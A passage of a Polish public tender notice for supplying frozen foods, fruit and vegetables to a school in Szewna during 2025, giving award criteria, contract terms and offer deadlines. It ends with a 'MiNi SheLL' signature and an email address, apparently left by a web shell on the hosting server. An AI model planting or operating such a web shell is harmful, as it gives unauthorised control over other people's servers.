ilości dzieci korzystających z posiłków , których Zamawiający nie jest w stanie określić na<br/>etapie przeprowadzania postępowania. W związku z czym Zamawiający zastrzega możliwość realizacji przedmiotu umowy<br/>do 80% jej wartości. Zamawiający zobowiązuje się do minimalnej realizacji zamówienia na poziomie nie mniejszym niż 80 %<br/>łącznej wartości przedmiotu zamówienia. Zgodnie z art. 441 Ustawy pzp Zamawiający zastrzega sobie prawo opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona na podstawie poniżej wskazanych kryteriów oceny ofert i ich wag punktowych</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość dostawcy od Zespołu Szkół Publicznych w Szewnie, ul. M. Langiewicza 3</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa mrożonych ryb, warzyw, owoców w ilościach określonych w Formularzu<br/>asortymentowo-cenowym stanowiącym Załącznik Nr 4.5 do SWZ.<br/>Wymagania dodatkowe dotyczące asortymentu:<br/>a) powinny cechować się wysokimi walorami smakowymi,<br/>b) dostarczane produkty muszą być I gatunku, świeże z odpowiednim terminem przydatności do spożycia, zgodne z<br/>obowiązującymi normami,<br/>c) bez uszkodzeń mechanicznych i zmian biologicznych,<br/>d) bez objawów chorób i pleśni.<br/>Produkty powinny być w opakowaniach dopuszczonych do kontaktu z żywnością, powinny zabezpieczać produkt przed<br/>uszkodzeniem i zanieczyszczeniem, czyste bez obcych zapachów, zabrudzeń i pleśni<br/>Zamówienie zostanie wykonane w okresie od dnia 1 stycznia 2025 r. do dnia 31 grudnia 2025 r.<br/>Wymagany termin wykonania przedmiotu zamówienia dla Części 5– 1 raz w tygodniu w godz. 7.00-13.00,<br/>Miejsce dostarczenia przedmiotu zamówienia: Zespół Szkół Publicznych w Szewnie ul. M. Langiewicza 3 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15896000-5 - Produkty głęboko mrożone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15221000-3 - Ryby mrożone</p> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <p class="mb-0">15332100-5 - Przetworzone owoce</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Wskazane w Formularzach asortymentowo – cenowych dla poszczególnych Części ilości przedmiotu zamówienia są<br/>wielkościami szacunkowymi (wyliczonymi na podstawie m.in. zużycia produktów w 2024 roku oraz iloczynu gramatur i ilości<br/>dzieci korzystających z posiłków) i w czasie obowiązywania umowy mogą ulec zmianie, co oznacza, że nie stanowią<br/>ostatecznego wymiaru zamówienia w wyniku, czego nie mogą być podstawą do zgłoszenia roszczeń z tytułu nie<br/>zrealizowanych dostaw lub podstawą do odmowy ich realizacji. Zamówienia będą wynikać z bieżącego zapotrzebowania<br/>Zamawiającego wynikającego z ilości dzieci korzystających z posiłków , których Zamawiający nie jest w stanie określić na<br/>etapie przeprowadzania postępowania. W związku z czym Zamawiający zastrzega możliwość realizacji przedmiotu umowy<br/>do 80% jej wartości. Zamawiający zobowiązuje się do minimalnej realizacji zamówienia na poziomie nie mniejszym niż 80 %<br/>łącznej wartości przedmiotu zamówienia. Zgodnie z art. 441 Ustawy pzp Zamawiający zastrzega sobie prawo opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona na podstawie poniżej wskazanych kryteriów oceny ofert i ich wag punktowych</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość dostawcy od Zespołu Szkół Publicznych w Szewnie, ul. M. Langiewicza 3</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa owoców i warzyw określonych w Formularzu asortymentowo-cenowym<br/>stanowiącym Załącznik Nr 4.6 do SWZ.<br/>Zamówienie zostanie wykonane w okresie od dnia 1 stycznia 2025 r. do dnia 31 grudnia 2025 r.<br/>Wymagany termin wykonania przedmiotu zamówienia:<br/>– 2-3 razy w tygodniu w godz. 7.00-13.00.<br/>Miejsce dostarczenia przedmiotu zamówienia: Zespół Szkół Publicznych w Szewnie, ul. M. Langiewicza 3, 27-400 Ostrowiec Św. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03100000-2 - Produkty rolnictwa i ogrodnictwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15300000-1 - Owoce, warzywa i podobne produkty</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Wskazane w Formularzach asortymentowo – cenowych dla poszczególnych Części ilości przedmiotu zamówienia są<br/>wielkościami szacunkowymi (wyliczonymi na podstawie m.in. zużycia produktów w 2024 roku oraz iloczynu gramatur i ilości<br/>dzieci korzystających z posiłków) i w czasie obowiązywania umowy mogą ulec zmianie, co oznacza, że nie stanowią<br/>ostatecznego wymiaru zamówienia w wyniku, czego nie mogą być podstawą do zgłoszenia roszczeń z tytułu nie<br/>zrealizowanych dostaw lub podstawą do odmowy ich realizacji. Zamówienia będą wynikać z bieżącego zapotrzebowania<br/>Zamawiającego wynikającego z ilości dzieci korzystających z posiłków , których Zamawiający nie jest w stanie określić na<br/>etapie przeprowadzania postępowania. W związku z czym Zamawiający zastrzega możliwość realizacji przedmiotu umowy<br/>do 80% jej wartości. Zamawiający zobowiązuje się do minimalnej realizacji zamówienia na poziomie nie mniejszym niż 80 %<br/>łącznej wartości przedmiotu zamówienia. Zgodnie z art. 441 Ustawy pzp Zamawiający zastrzega sobie prawo opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona na podstawie poniżej wskazanych kryteriów oceny ofert i ich wag punktowych</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość dostawcy od Zespołu Szkół Publicznych w Szewnie, ul. M. Langiewicza 3</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/>w art. 455 ustawy pzp oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik Nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-20 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Zespół Szkół Publicznych w Szewnie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-20 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com